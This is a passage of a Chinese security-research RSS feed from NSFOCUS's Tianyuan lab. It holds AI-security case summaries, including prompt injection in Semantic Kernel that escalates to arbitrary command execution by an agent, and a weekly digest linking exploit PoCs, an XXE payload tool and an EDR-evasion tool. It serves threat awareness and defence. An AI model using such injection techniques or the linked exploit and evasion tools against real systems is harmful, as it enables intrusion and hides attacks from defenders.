9.8）。在玄武实验室测试中，多次攻击意外激活了Agent的自主复盘机制，使其在无预设防御规则的情况下，自动生成安全技能并更新记忆，从而完成防御响应。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这是目前已记录的AI Agent在攻击模拟场景中展现出自主防御行为的早期案例之一。除底层RCE漏洞之外，这也引出了一个更关键的问题：在无预设规则的情况下自主演化出的防御能力，其边界与可控性如何界定。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 应用安全 · Agent安全 · <a class="wx_topic_link" topic-id="mp1zd7z9-jw205r" style="color: #576B95 !important;" data-topic="1" data-recommend="">#249</a></span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: 70%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Microsoft Semantic Kernel框架RCE漏洞          </span></strong></p></div></div><div style="display: inline-block;vertical-align: top;width: 30%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【应用阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">微软安全研究团队在Semantic Kernel框架中披露两个严重漏洞CVE-2026-25592与CVE-2026-26030，已在发布前完成修复。漏洞可将提示注入升级为宿主级别的任意代码执行，攻击者无需浏览器漏洞、恶意附件或内存损坏技术，一条精心构造的提示词即可触发agent调用工具链并执行任意命令。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI模型本身不是安全边界。当攻击者绕过模型层防护时，必须依赖传统端点检测来识别异常行为——例如AI agent进程突然生成命令行或向启动目录写入脚本。这一漏洞揭示了Agent框架层面的结构性风险：工具调用链路上的每个环节，都可能成为提示注入的落点。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 应用安全 · Agent安全 · <a class="wx_topic_link" topic-id="mp1zd7z9-2icuau" style="color: #576B95 !important;" data-topic="1" data-recommend="">#273</a></span></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">以上案例已完整收录于 AISS 大模型安全智链社区。AISS 社区现已持续建设：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">大模型安全知识库</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI安全案例库</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">类Claw威胁矩阵</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">同时将持续跟踪 AI安全前沿研究与真实攻击演化方向，围绕模型安全、AI Agent安全与治理、AI供应链等领域不断迭代更新。目前案例库已更新至 250+。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">如果你在工作中发现、复现或研究过 AI 安全相关事件，欢迎向 AISS 案例库提交。内容包括真实攻击复盘、漏洞技术分析或企业安全实践均可收录。投递内容将经过社区审核后进入案例库，并在相关页面标注贡献者信息，用于社区共建与研究参考。</span></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">附录：文末福利｜社区邀请码限量赠送</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AISS 案例库面向全社区开放，你的投递将直接帮助更多 AI 安全从业者建立对威胁态势的认知。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">转发本文并在评论区留言你最关注的 AI 安全方向，我们将随机抽取 10 位送出 AISS 社区邀请码。邀请码可用于访问完整知识库内容。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AISS大模型智链社区访问地址：<a href="https://aiss.nsfocus.com/#/" target="_blank">https://aiss.nsfocus.com/#/</a></span></p></div><div style="margin: 54px 0% 10px;text-align: center;justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 95%;vertical-align: top;border-style: solid;border-width: 2px;border-color: rgb(67, 146, 117);padding: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 11px;margin: -44px 0% 0px;box-sizing: border-box;"><div style="width: 7em;height: 7em;display: inline-block;vertical-align: middle;border-radius: 100%;background-color: rgb(255, 255, 255);margin: 0px -2.18em 0px -2.2em;box-sizing: border-box;"><div data-cacheurl="" data-remoteid="" style="width: 6em;height: 6em;margin: 0.5em auto;border-radius: 100%;background-position: 50.9993% 50%;background-repeat: no-repeat;background-size: 170.274%;border-width: 3px;border-style: solid;border-color: rgb(255, 255, 255);overflow: hidden;box-sizing: border-box;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=aac5ec15&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmbGad7Cu1YyU7ofgmztUs9y6pHS2asGRlgS69icq7ZibRYo6xztk21Jkwe6hZib5Oky9ar5vzPyJUlh5iaBAU9zX5ibfFMTvuLK7Zc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><p style="width: 100%;height: 100%;overflow: hidden;line-height: 0;max-width: 100%;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9722222222222222" data-s="300,640" data-type="png" data-w="1080" style="width: 100%;height: 100%;opacity: 0;box-sizing: border-box;" data-imgfileid="100011384" src="https://wechat2rss.xlab.app/img-proxy/?k=92e5af0c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCnKLMhv7sfibC6QLnej3BUXo7D8s9eqHRNvIyL0Tl8vACXhnZUtfzEsUubsb0US8yg09AJib2Im2zq2yyORwgsMqMzgic3fp0BL2U%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div><div style="justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 10px 10px 20px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.8;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">绿盟科技天元实验室</span></strong><span leaf="">专注于新型实战化攻防对抗技术研究。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究目标包括：漏洞利用技术、防御绕过技术、攻击隐匿技术、攻击持久化技术等蓝军技术，以及攻击技战术、攻击框架的研究。涵盖Web安全、终端安全、AD安全、云安全等多个技术领域的攻击技术研究，以及工业互联网、车联网等业务场景的攻击技术研究。通过研究攻击对抗技术，从攻击视角提供识别风险的方法和手段，为威胁对抗提供决策支撑。</span></p></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">文末福利｜社区邀请码限量赠送</span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本次我们准备了 10 个 AISS 社区邀请码。获取方式： 转发本文 + 点赞 + 评论区留言「申请邀请码」我们将从评论区中抽取 10 位朋友，私信发送邀请码。AISS 是专注 AI 安全的开放社区，涵盖大模型安全风险矩阵、知识库、案例库与事件库，欢迎 AI 安全研究者、开发者与企业安全团队加入共建。</span></p><div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="8 3 []"><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">附录｜参考来源</span></strong></p></div></div></div></div><p><span leaf="">[1] Google Security Blog. AI threats in the wild: The current state of prompt injections on the web. 2026年4月. </span></p><p><span leaf=""><a href="https://security.googleblog.com/2026/04/ai-threats-in-wild-current-state-of.html" target="_blank">https://security.googleblog.com/2026/04/ai-threats-in-wild-current-state-of.html</a> </span></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011383" src="https://wechat2rss.xlab.app/img-proxy/?k=6ef0f34d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCk5yDBSI0EaAxPawn0ialjicSTJTBl8PsJjjfuXvKau7aGu9pQJsILTLiaFht1U0SZE6MwkOYOCEwcMnCVoLxJXaJCaAZDoQicC0sQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907473309609" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011385" src="https://wechat2rss.xlab.app/img-proxy/?k=6a5bcf7e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jClQgn7nPZhdYv7GsaQvW0gGwXyzSRN7fJ4RAsmXgxYueD1XcrSHX9B8epvuxIyvRto8H9MOvyKo4e2algv0avQ61gn6yGcViaT8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2ce13e2c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247495038%26idx%3D1%26sn%3Dbdf03f33bc9acdfd1d516ad02b691d1d">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 12 May 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>每周蓝军技术推送（2026.5.2-5.8）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247495022&amp;idx=1&amp;sn=db735c6a19342e06024737d374d7d171</link>
      <description>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-05-08 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=f7acde9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCmbbXCQHfrQX5MIIXlibR0rTEB9ExqXMZvTB2TicvGRicAnMbibmCMibM3I5nMm0dMDbAQ78dzAva8hgia3nZFnZcU7nnlAAruWPgkvo%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</p>
  <div style="line-height: 1.6;letter-spacing: 0px;padding-right: 0px;padding-left: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011371" data-ratio="0.4222222222222222" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=f810cc13&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCnLj1jEpw6egnbwWmFGdTicNBBChA2pwXdR3ObwSAWxqyacwpaS6ktsnEsgpCg4ibHicq8OEVYs1RQCFbsxlaEygV4Hfrh7ZMesMw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内网渗透</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">MindsDB 25.9.1.1 路径遍历漏洞，可导致远程代码执行</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52547" target="_blank">https://www.exploit-db.com/exploits/52547</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">oxml_xxe：用于利用XXE漏洞进行渗透测试的工具，支持多种协议和payload生成</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/BuffaloWill/oxml_xxe" target="_blank">https://github.com/BuffaloWill/oxml_xxe</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">终端对抗</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Rustinel：基于Rust的EDR规避工具，通过内核回调隐藏进程以逃避检测</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Karib0u/rustinel" target="_blank">https://github.com/Karib0u/rustinel</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞相关</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">DirtyFrag：Linux内核本地提权漏洞公开PoC，可导致低权限用户获取root权限</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/V4bel/dirtyfrag" target="_blank">https://github.com/V4bel/dirtyfrag</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-31431：Linux内核CopyFail本地提权漏洞公开，低权限用户可提权至root，影响多个主流Linux发行版及4.14~6.19内核版本</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://copy.fail/" target="_blank">https://copy.fail/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Microsoft分析CopyFail漏洞对容器、Kubernetes及云环境的安全影响，并提供检测与缓解建议</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.microsoft.com/en-us/security/blog/2026/05/01/cve-2026-31431-copy-fail-vulnerability-enables-linux-root-privilege-escalation/" target="_blank">https://www.microsoft.com/en-us/security/blog/2026/05/01/cve-2026-31431-copy-fail-vulnerability-enables-linux-root-privilege-escalation/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2025-34282：ThingsBoard 4.2.0 通过 SVG 图片上传功能实现服务端请求伪造</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 